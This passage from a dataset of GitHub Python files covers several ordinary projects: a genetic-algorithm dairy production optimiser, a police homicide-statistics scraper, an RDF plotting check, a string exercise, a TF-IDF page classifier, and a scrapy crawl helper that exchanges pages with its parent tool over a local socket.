column_profit = []\n \n qtd = self.np_selected_products.shape[0]\n for pos in range( 0, qtd ):\n if self.np_selected_products[pos] > 0:\n column_product.append( self.np_products_list[pos] )\n column_qtd.append( self.np_selected_products[pos] )\n column_milk.append( self.np_milk_list[pos] )\n acum_milk += self.np_milk_list[pos]\n column_hour.append( self.np_hours_list[pos] )\n acum_hours += self.np_hours_list[pos]\n column_profit.append( self.np_profit_list[pos] )\n acum_profit += self.np_profit_list[pos]\n\n column_product.append( \"\" )\n column_qtd.append( \"\" )\n column_milk.append( acum_milk )\n column_hour.append( acum_hours )\n column_profit.append( acum_profit )\n\n response[column_product_name] = column_product\n response[column_qtd_name] = column_qtd\n response[column_milk_name] = column_milk\n response[column_hour_name] = column_hour\n response[column_profit_name] = column_profit\n \n pd_response = pd.DataFrame( data = response )\n return pd_response\n\n\n def __init__( self, pd_resources ):\n if pd_resources is None:\n raise ValueError\n\n products_List = []\n milk_list = []\n hours_list = []\n profit_list = []\n\n try:\n for index in pd_resources.itertuples():\n if index[1][0:1].lower() != \"#\":\n # 0 1 2 3\n # Product, milk, hour, profit\n products_List.append(index[1])\n milk_list.append(int(index[2]))\n hours_list.append(int(index[3]))\n profit_list.append(int(index[4]))\n\n self.np_products_list = np.array(products_List)\n self.np_milk_list = np.array(milk_list)\n self.np_hours_list = np.array(hours_list)\n self.np_profit_list = np.array(profit_list)\n\n except Exception as inst:\n print(inst)\n print(\"File load failure!\")\n raise ValueError\n \n\ndef stop_search( hour_limit, hour_tolerance, milk_limit, milk_tolerance, population, best_fit_array, medium_fit_array, generation, resources ):\n if hour_limit <= 0:\n raise ValueError\n if hour_tolerance <= 0:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if milk_tolerance <= 0:\n raise ValueError\n if population is None:\n raise ValueError\n if best_fit_array is None:\n raise ValueError\n if medium_fit_array is None:\n raise ValueError\n if generation <= 0:\n raise ValueError\n if resources is None:\n raise ValueError\n\n if generation == 0:\n return False\n\n ret = False\n\n best_fitness = 0\n best_hour = 0\n best_milk = 0\n\n medium_fitness = 0\n medium_hour = 0\n medium_milk = 0\n\n fitness_amount = 0\n hour_amount = 0\n milk_amount = 0\n\n #Calcula fitness medio da populacao e guarda o fitness do melhor candidato\n pop_sorted_by_fitness = sorted( population, key = Candidate.get_fitness, reverse = True)\n best_candidate = pop_sorted_by_fitness[0]\n best_fitness = best_candidate.fitness\n best_hour = best_candidate.hour\n best_milk = best_candidate.milk\n\n for cand in pop_sorted_by_fitness:\n fitness_amount += cand.fitness\n hour_amount += cand.hour\n milk_amount += cand.milk\n \n #Precisa pular a primeira geracao porque ainda nao foi filtrada\n if generation > 1:\n\n if cand.fitness >= best_fitness:\n best_candidate = cand\n \n best_fitness = cand.fitness\n best_hour = cand.hour\n best_milk = cand.milk\n \n if( best_hour <= hour_limit and (hour_limit - best_hour) <= hour_tolerance and\n best_milk <= milk_limit and (milk_limit - best_milk) <= milk_tolerance ):\n ret = True\n resources.set_selected_products( cand )\n #Mostra dados do melhor candidato\n print(\"\")\n print( \"fitness: {0} , hour: {1} , milk: {2} , profit: {3} , DNA: {4}\".format(best_candidate.fitness, best_candidate.hour, best_candidate.milk, best_candidate.profit, best_candidate.np_dna ))\n \n print( \"Hour : {0}\".format( resources.np_hours_list ))\n print( \"Milk : {0}\".format( resources.np_milk_list ))\n print( \"Profit: {0}\".format( resources.np_profit_list ))\n return True\n\n if generation > 30 and best_fitness == 0: #Nao houve melhoria nesta geracao entao repete o melhor colocado \n best_fitness = best_fit_array[generation - 2]\n\n medium_hour = hour_amount / len( population )\n medium_milk = milk_amount / len( population )\n medium_fitness = fitness_amount / len( population )\n\n #Registra resultados \n best_fit_array.append( best_fitness )\n medium_fit_array.append( medium_fitness )\n\n #Verifica se houve alguma alteracao nas 5 ultimas geracoes\n if generation > 30:\n if best_candidate.hour <= hour_limit and best_candidate.milk <= milk_limit:\n if best_fit_array[generation - 2] == best_fit_array[generation - 3]:\n if best_fit_array[generation - 3] == best_fit_array[generation - 4]:\n if best_fit_array[generation - 4] == best_fit_array[generation - 5]:\n ret = True\n resources.set_selected_products( best_candidate )\n #Mostra dados do melhor candidato\n print(\"\")\n print( \"fitness: {0} , hour: {1} , milk: {2} , profit: {3} , DNA: {4}\".format(best_candidate.fitness, best_candidate.hour, best_candidate.milk, best_candidate.profit, best_candidate.np_dna ))\n \n print( \"Hour : {0}\".format( resources.np_hours_list ))\n print( \"Milk : {0}\".format( resources.np_milk_list ))\n print( \"Profit: {0}\".format( resources.np_profit_list ))\n\n #Mostra resultados\n print(\"Generation: {0} - Fitness [hour / milk] best: {1} [{2} / {3}] - Fitness [hour / milk] medium: {4} [{5} / {6}]\".format(generation, best_fitness, best_hour, best_milk, medium_fitness, medium_hour, medium_milk))\n \n return ret\n\n\n\n\ndef search( hour_tolerance, hour_limit, milk_tolerance, milk_limit, resources ):\n if hour_tolerance <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if milk_tolerance <= 0:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if resources is None:\n raise ValueError\n\n ini_pop_qt = 200 #Usar 1000\n intermed_pop_qt = 2000 #usar 10000\n #mutation_rate = 0.2 #Testando com 80%\n crossover_rate = 0.8 #Testando com 20%\n\n if len(resources.np_products_list) < 2:\n print(\"\\nProducts not found. Using random option\")\n available_products_qt = int(float(input(\"\\nProducts amunt to create (limit: 1010): \")))\n else:\n available_products_qt = len(resources.np_products_list) - 1\n\n if available_products_qt <= 0:\n print(\"\\nProduct amount limit should be higher than zero!\\n\")\n exit()\n \n if available_products_qt > 1010:\n print(\"Amounts higher than 1010 are forbiden!\")\n exit()\n\n if available_products_qt <= 15:\n print(\"There are \" + str(2 ** available_products_qt) + \" possible solutions for this products amount\")\n else:\n possible_solutions = 2 ** available_products_qt\n search_years = possible_solutions / (3600 * 24 * 365 * 1000000)\n print(\"There are {0:+5.2E} possible solutions for this products amount\".format(possible_solutions))\n if available_products_qt > 44:\n print(\"\\nIf we had a computer capable of processing 1.000.000 candidates each second\")\n print(\"and considering that one year has (60s * 60m * 24h * 365d) 31.536.000 seconds\")\n print(\"it would take {0:+5.2e} years to find the best solution.\".format(search_years))\n print(\"Therefore, we'll search for just a good solution, not for the best one.\")\n print(\"The good solution will be the candidate with the best profit within the limit of available hours and milk in a week \\n\")\n\n populat = create_initial_population( ini_pop_qt, milk_limit, hour_limit, resources )\n population = sorted( populat, key = Candidate.get_profit, reverse = True )\n\n #print(\"Show the initical population: \")\n #for pos in range(0, len(population)):\n # print(\"hour: {0} , profit: {1} , DNA: {2}\".format(population[pos].hour, population[pos].profit, population[pos].np_dna))\n \n generation = 1\n xItera = [1]\n best_fit_array = []\n medium_fit_array = []\n\n #Repete este ciclo ate condicao de parada\n while not stop_search( hour_limit, hour_tolerance, milk_limit, milk_tolerance, population, best_fit_array, medium_fit_array, generation, resources ):\n #Cria nova populacao intermediaria com mutacao e crossover\n #Para manter a diversidade genetica a semente para a proxima geracao sera formada por 40% dos melhores candidatos atuais e 10% dos piores\n \n #==>Seleciona os pais para reproducao\n best_cand_qt = int(30 * ini_pop_qt / 100)\n worst_cand_qt = int(20 * ini_pop_qt / 100)\n cand_for_reproduction_1 = np.copy(population[:best_cand_qt])\n cand_for_reproduction_2 = np.copy(population[ini_pop_qt - worst_cand_qt:])\n cand_for_reproduction = np.append(cand_for_reproduction_1, cand_for_reproduction_2)\n \n #==>Reproducao por CROSSOVER\n crossover_qt = int(crossover_rate * (intermed_pop_qt - len(cand_for_reproduction)))\n if (crossover_qt % 2) != 0:\n crossover_qt = crossover_qt + 1\n\n intermed_pop_crossover = apply_crossover(crossover_qt, cand_for_reproduction, milk_limit, hour_limit, resources)\n \n #==>Reproducao por MUTACAO\n mutation_qt = intermed_pop_qt - len(cand_for_reproduction) - crossover_qt\n \n #==>Selecao da proxima geracao de candidatos\n intermed_pop_mutation = apply_mutation(mutation_qt, cand_for_reproduction, milk_limit, hour_limit, resources)\n \n intermed_pop = np.append(cand_for_reproduction, intermed_pop_crossover)\n intermed_pop = np.append(intermed_pop, intermed_pop_mutation)\n #print(\"Size of intermed pop: {0}\".format(len(intermed_pop)))\n\n population = apply_selection(ini_pop_qt, hour_limit, milk_limit, intermed_pop)\n\n #Registra parte dos resultados\n generation = generation + 1\n xItera.append(generation)\n\n \n\n\ndef apply_selection(pop_qt, hour_limit, milk_limit, pop_inter):\n if pop_qt <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if pop_inter is None:\n raise ValueError\n \n #Fase 1: elimina candidatos acima do limite de hora ate limite da quantidade desejada para a populacao\n #Ordena populacao intermediaria em ordem decrescente usando o limite de hora\n #Remove todos acima do limite de hora ou ate que sobre somente qtd_pop\n pop_sorted_by_hour = sorted( pop_inter, key = Candidate.get_hour, reverse = True)\n dismissed = True\n while len(pop_sorted_by_hour) > pop_qt and dismissed == True:\n pop_sorted_by_hour = np.delete(pop_sorted_by_hour, 0)\n cand = pop_sorted_by_hour[0]\n if cand.hour > hour_limit:\n dismissed = True\n else:\n dismissed = False\n\n #Fase 2: elimina candidatos acima do limite de leite ate limite da quantidade desejada para a populacao\n #Ordena populacao intermediaria em ordem decrescente usando o limite de leite\n #Remove todos acima do limite de leite ou ate que sobre somente qtd_pop\n pop_sorted_by_milk = sorted( pop_sorted_by_hour, key = Candidate.get_milk, reverse = True)\n dismissed = True\n while len(pop_sorted_by_milk) > pop_qt and dismissed == True:\n pop_sorted_by_milk = np.delete(pop_sorted_by_milk, 0)\n cand = pop_sorted_by_milk[0]\n if cand.milk > milk_limit:\n dismissed = True\n else:\n dismissed = False\n\n #Fase 3: elimina candidatos ate o limite da quantidade desejada para a populacao\n pop_sorted_by_fitness = sorted( pop_sorted_by_milk, key = Candidate.get_fitness, reverse = True)\n pop_sorted_by_fitness_sharp = pop_sorted_by_fitness[0:pop_qt]\n \n return pop_sorted_by_fitness_sharp\n\n\n\ndef apply_crossover(crossover_qt, cand_to_repro, milk_limit, hour_limit, prod_list):\n if crossover_qt <= 0:\n raise ValueError\n if cand_to_repro is None:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n\n #A crossover_qt indica a quantidade de descendentes a ser produzida\n #Em cada ciclo sao criados dois novos descendentes\n #Entao serao realizados \"crossover_qt/2\" ciclos\n #Em cada ciclo:\n #Seleciona 2 pais da lista de candidatos a reproducao, p1 e p2\n #Seleciona ponto de crossover\n #Cria dois novos candidatos, f1 e f2\n #Copia DNA de p1 ate o ponto de crossover para o inicio de f1\n #Copia DNA de p1 apos o ponto de crossover para o fim de f2\n #Copia DNA de p2 ate o ponto de crossover para o inicio de f2\n #Copia DNA de p2 apos o ponto de crossover para o fim de f1\n #Acrescenta novos filhos na lista parcial de candidatos\n #Devolve a lista parcial criada\n \n new_pop_crossover = []\n np_new_pop_crossover = np.array(new_pop_crossover)\n\n qtd_cicles = int(crossover_qt / 2)\n for pos in range(0, qtd_cicles):\n choice_limit = len(cand_to_repro) - 2\n posic_cand1 = randint(1, choice_limit)\n p1 = cand_to_repro[posic_cand1] #Seleciona p1\n #Obs.: p2 deve ser diferente de p1 para evitar perda de diversidade genetica\n posic_cand2 = randint(1, choice_limit)\n while posic_cand1 == posic_cand2: \n posic_cand2 = randint(1, choice_limit)\n p2 = cand_to_repro[posic_cand2] #Seleciona p2\n\n# #Mostra DNA dos pais\n# print(\"[Father 1]hour: {0} profit: {1} DNA: {2}\".format(p1.hour, p1.profit, p1.np_dna))\n# print(\"[Father 2]hour: {0} profit: {1} DNA: {2}\".format(p2.hour, p2.profit, p2.np_dna))\n\n dna_length = len(p1.np_dna)\n choice_limit = dna_length - 2 #Todos os DNAs tem o mesmo tamanho e quero excluir os extremos\n pto_cross = randint(1, choice_limit) \n \n f1 = Candidate(milk_limit, hour_limit, prod_list) #DNA ja foi criado mas sera alterado por crossover\n f2 = Candidate(milk_limit, hour_limit, prod_list) #DNA tambem sera alterado\n \n #Copia parte de p1 para f1 e parte de f2 para p2\n for pos in range(0, pto_cross): #Adorei esse foreach() esquisitao\n f1.np_dna[pos] = p1.np_dna[pos]\n f2.np_dna[pos] = p2.np_dna[pos]\n \n #Copia parte de p1 para f2 e parte de p2 para f1 \n for pos in range(pto_cross, dna_length):\n f1.np_dna[pos] = p2.np_dna[pos]\n f2.np_dna[pos] = p1.np_dna[pos]\n \n #Ajusta fitness dos novos candidatos\n f1.fitness_evaluation( milk_limit, hour_limit, prod_list )\n f2.fitness_evaluation( milk_limit, hour_limit, prod_list ) \n \n #Acrescenta novos candidatos na lista parcial \n np_new_pop_crossover = np.append(np_new_pop_crossover, f1)\n np_new_pop_crossover = np.append(np_new_pop_crossover, f2)\n\n# #Mostra DNA dos filhos\n# print(\"Ponto de crossover: \" + str(pto_cross))\n# print(\"[Son 1]hour: {0} profit: {1} DNA: {2}\".format(f1.hour, f1.profit, f1.np_dna))\n# print(\"[Son 2]hour: {0} profit: {1} DNA: {2}\".format(f2.hour, f2.profit, f2.np_dna))\n\n return np_new_pop_crossover\n\n\ndef apply_mutation(wished_qt, cand_to_repro, milk_limit, hour_limit, prod_list):\n if wished_qt <= 0:\n raise ValueError\n if cand_to_repro is None:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n\n #Cada candidato tem seu vetor de zeros e uns ( DNA[] )\n #Cada candidato selecionado gera um clone\n #Aplica mutacao no novo candidato\n \n new_pop_mutation = []\n np_new_pop_mutation = np.array( new_pop_mutation )\n\n for pos in range( 0, wished_qt ):\n #Seleciona aleatoriamente um membro do grupo de candidatos a reproducao\n new_cand = Candidate( milk_limit, hour_limit, prod_list ) #Este novo candidato vai receber o DNA alterado por mutacao\n choice_limit = len( cand_to_repro ) - 1\n cand_position = randint( 0, choice_limit )\n cand = cand_to_repro[cand_position]\n new_cand.np_dna = np.copy( cand.np_dna )\n\n #Aplica mutacao em um ponto de seu DNA\n mutation_limit = len( new_cand.np_dna ) - 1\n mutation_target = randint( 0, mutation_limit )\n if new_cand.np_dna[mutation_target] == 0: \n new_cand.np_dna[mutation_target] = 1\n else:\n new_cand.np_dna[mutation_target] = 0\n \n new_cand.fitness_evaluation( milk_limit, hour_limit, prod_list )\n\n# #Mostra DNA do pai\n# print(\"[Father]hour: {0} profit: {1} DNA: {2}\".format(cand.hour, cand.profit, cand.np_dna))\n# #Mostra DNA dos pais\n# print(\"[Son]hour: {0} profit: {1} DNA: {2}\".format(new_cand.hour, new_cand.profit, new_cand.np_dna))\n \n #Insere novo candidato na populacao intermediaria\n np_new_pop_mutation = np.append( np_new_pop_mutation, new_cand )\n \n return np_new_pop_mutation\n \n\n\ndef create_initial_population( init_pop_qt, milk_limit, hour_limit, prod_list ):\n if init_pop_qt <= 0:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n \n pop = []\n for pos in range( 0, init_pop_qt ):\n cand = Candidate( milk_limit, hour_limit, prod_list )\n pop.append( cand )\n return pop\n \n\n\n\nif __name__ == '__main__':\n hour_tolerance = 2\n milk_tolerance = 50\n resources_file_name = \"\"\n\n print(\"\\n###################################################################\")\n print(\"# #\")\n print(\"# Dairy cooperative problem #\")\n print(\"# #\")\n print(\"###################################################################\")\n\n\n resources_file_name = input(\"\\nDairy parameters file name: \")\n if resources_file_name == \"\":\n print(\"\\nParameters file missing\\n\")\n exit()\n\n try:\n pd_resources = pd.read_csv( resources_file_name )\n resources = ProductsList( pd_resources )\n except:\n print(\"\\nParameters load failure\\n\")\n exit()\n\n try:\n hour_limit = int(float(input(\"\\nWeek hour limit: \")))\n if hour_limit <= 0:\n print(\"\\nWeek hour limit must be higher than zero!\\n\")\n exit()\n except:\n raise ValueError\n\n try:\n milk_limit = int(float(input(\"\\nWeek milk limit: \")))\n if milk_limit <= 0:\n print(\"\\nWeek milk limit must be higher than zero!\\n\")\n exit() \n except:\n raise ValueError\n\n\n exec_init = time.time() \n\n search( hour_tolerance, hour_limit, milk_tolerance, milk_limit, resources )\n \n print( resources.get_selected_products())\n\n exec_end = time.time()\n diff = exec_end - exec_init\t\n hours, r = divmod(diff, 3600)\n minutes, seconds = divmod(r, 60)\n print(\"\\nElapsed time: {hours:0>2}:{minutes:0>2}:{seconds:05.3f}\".format(hours=int(hours), minutes=int(minutes), seconds=seconds))\n ","repo_name":"platiagro/GA","sub_path":"dairy_cooperative/dairy_cooperative/cooperative_ga_CSV.py","file_name":"cooperative_ga_CSV.py","file_ext":"py","file_size_in_byte":23119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20972858721","text":"\"\"\"Scrape the total homicide count from the Philadelphia Police Department's \nCrime Stats website.\"\"\"\n\nfrom dataclasses import dataclass\nfrom datetime import date\n\nimport cloudscraper\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom cached_property import cached_property\nfrom loguru import logger\n\nfrom . import DATA_DIR\n\n\n@dataclass\nclass PPDHomicideTotal:\n \"\"\"Total number of homicides scraped from the Philadelphia Police\n Department's website.\n\n This provides:\n - Annual totals since 2007 for past years.\n - Year-to-date homicide total for the current year.\n\n Source\n ------\n https://www.phillypolice.com/crime-maps-stats/\n \"\"\"\n\n debug: bool = False\n\n URL = \"https://www.phillypolice.com/crime-maps-stats/\"\n\n def __post_init__(self):\n scraper = cloudscraper.create_scraper()\n self.soup = BeautifulSoup(scraper.get(self.URL).content, \"lxml\")\n\n @cached_property\n def years(self):\n \"\"\"The years available on the page. Starts with 2007.\"\"\"\n\n return [\n int(td.text)\n for td in self.soup.select(\"#homicide-stats\")[0]\n .find(\"tr\")\n .find_all(\"th\")[1:]\n ]\n\n @cached_property\n def as_of_date(self):\n \"\"\"The current \"as of\" date on the page.\"\"\"\n\n date = (\n self.soup.select(\"#homicide-stats\")[0]\n .select(\"tbody\")[0]\n .select_one(\"td\")\n .text.split(\"\\n\")[0]\n )\n return pd.to_datetime(date + \" 11:59:00\")\n\n @cached_property\n def annual_totals(self):\n \"\"\"The annual totals for homicides in Philadelphia.\"\"\"\n\n # This is for historic data only (doesn't include current year)\n annual_totals = [\n int(td.text)\n for td in self.soup.select(\"#homicide-stats\")[1].find_all(\"td\")[1:]\n ]\n\n if len(annual_totals) != len(self.years[1:]):\n raise ValueError(\n \"Length mismatch between parsed years and annual homicide totals\"\n )\n\n return pd.DataFrame(\n {\"year\": self.years[1:], \"annual\": annual_totals}\n ).sort_values(\"year\", ascending=False)\n\n @cached_property\n def ytd_totals(self):\n \"\"\"The year-to-date totals for homicides in Philadelphia.\"\"\"\n\n # Scrape the table\n table = self.soup.select(\"#homicide-stats\")[0]\n ytd_totals = [table.select(\"tbody\")[0].select(\".homicides-count\")[0].text]\n ytd_totals += [td.text for td in table.select(\"tbody\")[0].find_all(\"td\")[2:-1]]\n ytd_totals = list(map(int, ytd_totals))\n\n if len(ytd_totals) != len(self.years):\n raise ValueError(\"Length mismatch between parsed years and homicides\")\n\n # Return ytd totals, sorted in ascending order\n out = pd.DataFrame({\"year\": self.years, \"ytd\": ytd_totals})\n return out.sort_values(\"year\", ascending=False)\n\n @property\n def path(self):\n return DATA_DIR / \"raw\" / \"homicide_totals_daily.csv\"\n\n def get(self):\n \"\"\"Get the shooting victims data, either loading\n the currently downloaded version or a fresh copy.\"\"\"\n\n # Load the database of daily totals\n df = pd.read_csv(self.path, parse_dates=[0])\n\n # Make sure it's in ascending order by date\n return df.sort_values(\"date\", ascending=True)\n\n def _get_years_from_year_end_section(self):\n return [\n int(th.text)\n for th in self.soup.select(\"#homicide-stats\")[1]\n .select_one(\"tr\")\n .select(\"th\")[1:]\n ]\n\n def update(self, force=False):\n \"\"\"Update the local data via scraping the PPD website.\"\"\"\n\n # Check for new year's\n year_end_years = self._get_years_from_year_end_section()\n max_year_end_year = max(year_end_years)\n\n thisYear = date.today().year\n if thisYear != max_year_end_year + 1:\n raise ValueError(\n f\"It seems like we are in a new year {thisYear} but the homicide page hasn't been updated yet\"\n )\n\n # Load the database\n database = self.get()\n\n # Latest database date\n latest_database_date = database.iloc[-1][\"date\"]\n\n # Update if we need to\n if force or latest_database_date < self.as_of_date:\n\n if self.debug:\n logger.debug(\"Parsing PPD website to update YTD homicides\")\n\n # Merge annual totals (historic) and YTD (current year)\n data = pd.merge(self.annual_totals, self.ytd_totals, on=\"year\", how=\"outer\")\n\n # Add new row to database\n YTD = self.ytd_totals.iloc[0][\"ytd\"]\n database.loc[len(database)] = [self.as_of_date, YTD]\n\n # Sanity check on new total\n new_homicide_total = database.iloc[-1][\"total\"]\n old_homicide_total = database.iloc[-2][\"total\"]\n new_year = database.iloc[-1][\"date\"].year\n old_year = database.iloc[-2][\"date\"].year\n if (\n not force\n and new_homicide_total < old_homicide_total\n and (new_year == old_year)\n ):\n raise ValueError(\n f\"New YTD homicide total ({new_homicide_total}) is less than previous YTD total ({old_homicide_total})\"\n )\n\n # Save it\n path = DATA_DIR / \"processed\" / \"homicide_totals.json\"\n data.set_index(\"year\").to_json(path, orient=\"index\")\n\n # Save it\n if self.debug:\n logger.debug(\"Updating PPD homicides data file\")\n\n # Drop duplicates and save\n database.drop_duplicates(subset=[\"date\"], keep=\"last\").to_csv(\n self.path, index=False\n )\n","repo_name":"PhilaController/gun-violence-dashboard-data","sub_path":"gun_violence_dashboard_data/homicides.py","file_name":"homicides.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"34140736761","text":"\"\"\"\nThis file exists to test all the g(r) results against those \ndetermined with VMD.\n\"\"\"\n\nimport patchyAnalysisTools.trajectory as trj\nimport matplotlib.pyplot as plt\nimport pdb\nimport numpy as np\n\n# load trajectory\ntraj = trj.trajectory(file_name=\"final.conf\")\n\n# get the last frame\nlast_frame = traj.get_last_frame()\n\n# get g(r)\nr,gr = last_frame.calculate_rdf()\n\n# get g_00(r)\nr,gr_00 = last_frame.calculate_rdf(selection=(0,0))\n\n# get g_11(r)\nr,gr_11 = last_frame.calculate_rdf(selection=(1,1))\n\n# get g_01(r)\nr,gr_01 = last_frame.calculate_rdf(selection=(0,1))\n\n# get g_10(r)\nr,gr_10 = last_frame.calculate_rdf(selection=(1,0))\n\n# load VMD data\ndata0 = np.loadtxt('g00.dat')\ndata1 = np.loadtxt('g11.dat')\ndata01 = np.loadtxt('g01.dat')\n\n# plot\nplt.plot(r,gr,label=\"g(r)\")\nplt.plot(r,gr_00,label=\"g_00\")\nplt.plot(data0[:,0],data0[:,1],label=\"g_00 from vmd\")\nplt.plot(data1[:,0],data1[:,1],label=\"g_11 from vmd\")\nplt.plot(data01[:,0],data01[:,1],label='g_01 from vmd')\nplt.plot(r,gr_11,label=\"g_11\")\nplt.plot(r,gr_01,label=\"g_01\")\nplt.plot(r,gr_10,label=\"g_10\")\nplt.legend()\nplt.yscale('log')\nplt.show()","repo_name":"sodiumnitrate/patchyAnalysisTools","sub_path":"examples/g_ab_test/test_gr.py","file_name":"test_gr.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"18303283751","text":"'''\ngiven a string s, return a string that contains no sequences of 3 consecutive\nidentical letters by removing the minimum number of consec letters.\n\nexamples:\needaaad => eedaad, remove an 'a'\nabbbcccdd => abbccdd\n\neeeeeee => ee\n\nefffeee => effee\n\n\napproach:\nsimilar to longest semi alternating string. keep a count variable that\nkeeps track of how many times we've seen s[i] == s[i-1], don't append the current\nchar to the result if the count >= 2. once we see s[i] != s[i-1], reset count\n'''\n\n\ndef string_without_3_consec(s):\n if not s or len(s) == 1:\n return s\n count = 0\n result = [s[0]]\n for i in range(1, len(s)):\n if s[i] == s[i-1]:\n count+=1\n else:\n count=0\n if count >= 2:\n continue\n else:\n result.append(s[i])\n return \"\".join(result)\n\ndatas = [\n (\"eedaaad\", \"eedaad\"),\n (\"abbbcccdd\", \"abbccdd\"),\n (\"eeeee\", \"ee\"),\n (\"abcabcccdc\", \"abcabccdc\"),\n (\"eeeeeedddddffddddee\", \"eeddffddee\"),\n (\"uuuuxaaaaxuuu\", \"uuxaaxuu\")\n]\n\nfor data in datas:\n try:\n assert(string_without_3_consec(data[0]) == data[1])\n print(f\"assertion succeeded for {data[0]} == {data[1]}\")\n except AssertionError:\n print(f\"assertion failed for for {data[0]} == {data[1]}\")\n\n\n","repo_name":"ivanwakeup/algorithms","sub_path":"algorithms/prep/microsoft/string_without_3_consec.py","file_name":"string_without_3_consec.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"19137851012","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis modules serves as a helper for the AVAIN crawler. It runs a simple scrapy spider\nthat crawls URLs, sends the responses to the AVAIN crawler that processes them and sends\nback new URLs to crawl.\n\"\"\"\n\nimport socket\nimport sys\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.spiders import CrawlSpider\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom scrapy.http import Request\n\nimport ipc_operations\n\nUNIX_SOCK_ADDR = \"./crawler_socket\"\nRECV_BUFFER_SIZE = 4096\nALLOWED_DOMAINS = []\n\n\nclass AvainCrawlSpider(CrawlSpider):\n name = \"avain_crawl_spider\"\n\n def __init__(self, cookies, **kwargs):\n super().__init__(**kwargs)\n self.cookies = cookies\n\n def parse(self, response):\n \"\"\" Parse the response by sending it to the AVAIN crawler module \"\"\"\n response.request.callback = None # needed for pickling\n response.request.errback = None # needed for pickling\n\n ipc_operations.send_object(SOCK, response) # send the response object\n yield_urls = ipc_operations.receive_object(SOCK) # receive new URLs to crawl\n\n # prepare and yield a request for every new URL\n for url in yield_urls:\n req = self.get_request(url)\n yield req\n\n def on_error(self, failure):\n \"\"\" Overrides the default method to catch and process e.g. status 500 responses \"\"\"\n\n if isinstance(failure.value, HttpError):\n response = failure.value.response\n return self.parse(response)\n return None\n\n def make_requests_from_url(self, url):\n \"\"\" Overrides the default method to catch by default discarded HTTP responses \"\"\"\n\n return self.get_request(url)\n\n def get_request(self, url):\n \"\"\" Prepare a request with proper configuration and configured cookies \"\"\"\n\n req = Request(url, callback=self.parse, dont_filter=True, errback=self.on_error,\n meta={'dont_redirect': True, 'handle_httpstatus_list': [301, 302, 401, 403, 405]})\n for key, val in self.cookies.items():\n req.cookies[key] = val\n return req\n\n\nif __name__ == \"__main__\":\n # create the IPC socket\n SOCK = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n try:\n SOCK.connect(UNIX_SOCK_ADDR)\n except socket.error as msg:\n sys.stderr.write(msg)\n sys.exit(1)\n\n # receive initial information\n init_dict = ipc_operations.receive_object(SOCK)\n # logging.getLogger(\"scrapy\").propagate = False\n\n # start crawling\n process = CrawlerProcess({\n \"USER_AGENT\": init_dict[\"user_agent\"]\n })\n process.crawl(AvainCrawlSpider, allowed_domains=init_dict[\"allowed_domains\"],\n start_urls=init_dict[\"start_urls\"], cookies=init_dict[\"cookies\"])\n process.start()\n\n # shutdown and close connection when finished\n SOCK.shutdown(socket.SHUT_RDWR)\n SOCK.close()\n","repo_name":"ra1nb0rn/avain","sub_path":"modules/web/crawler/crawl_helper.py","file_name":"crawl_helper.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"76"} +{"seq_id":"23000556441","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nimport os\nimport numpy as np\nfrom nltk.corpus import stopwords\n\n\nlabel_fn = []\nfor root, subdirs, files in os.walk('data'):\n if root != 'data':\n label = root.split('/')[-1]\n for fn in files:\n label_fn.append((label, root + '/' + fn))\n\nlabels = [t[0] for t in label_fn]\nfilenames = [t[1] for t in label_fn]\n\ntf = TfidfVectorizer(input='filename', stop_words=stopwords.words('english'),\n decode_error='ignore', max_df=0.95, min_df=0.05)\nX = tf.fit_transform(filenames).todense()\nprint('Vectorization Done')\nprint('Number of features = %d' % X.shape[1])\n\nle = LabelEncoder()\n\ny_str = labels\ny = le.fit_transform(y_str)\nprint('Label Encoding Done')\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=13)\n\nclf = SVC(C=1000.0)\n# or RandonForestClassifier()\n# or GradientBoostingClassifier()\nclf.fit(X_train, y_train)\nprint('Learning Complete')\n\ny_pred = clf.predict(X_test)\nprint('Testing Samples = %d' % len(y_test))\nprint('Correctly classified Samples = %d' % np.sum(y_pred == y_test))\nprint('Percentage Classified Correctly = %f' % (np.sum(y_pred == y_test)*100.0/len(y_test)))\n\n #exit(0)\n #if root != 'data':\n # exit(0)","repo_name":"vighneshbirodkar/web","sub_path":"webc.py","file_name":"webc.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5453947439","text":"from __future__ import absolute_import\nfrom contextlib import contextmanager\nfrom node.events import NodeAddedEvent\nfrom node.events import NodeCreatedEvent\nfrom node.events import NodeDetachedEvent\nfrom node.events import NodeModifiedEvent\nfrom node.events import NodeRemovedEvent\nfrom node.interfaces import IAttributesLifecycle\nfrom node.interfaces import ILifecycle\nfrom plumber import Behavior\nfrom 